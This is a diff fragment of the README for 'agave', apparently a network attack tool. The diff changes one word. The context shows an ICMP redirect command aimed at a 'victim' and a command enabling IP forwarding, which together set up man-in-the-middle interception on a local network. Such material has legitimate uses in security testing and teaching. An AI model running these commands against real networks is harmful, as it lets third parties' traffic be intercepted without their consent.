Claudjos/agave/README.md

 ```
 python3 -m agave icmp redirect 8.8.8.8 192.168.0.2 192.168.0.3 192.168.0.1
 ```
 The command above is enough to get a couple of messages from the victim.
-But your system will not forward the messages to their destination, and will tell the victim to use another router to reach the destination.
+But your system will not forward the messages to their destination, and will tell the victim to use another router to reach the destination instead.
 So you'll need also to:
 ```
 # Enable forwarding
 echo 1 | sudo tee /proc/sys/net/ipv4/conf/*/forwarding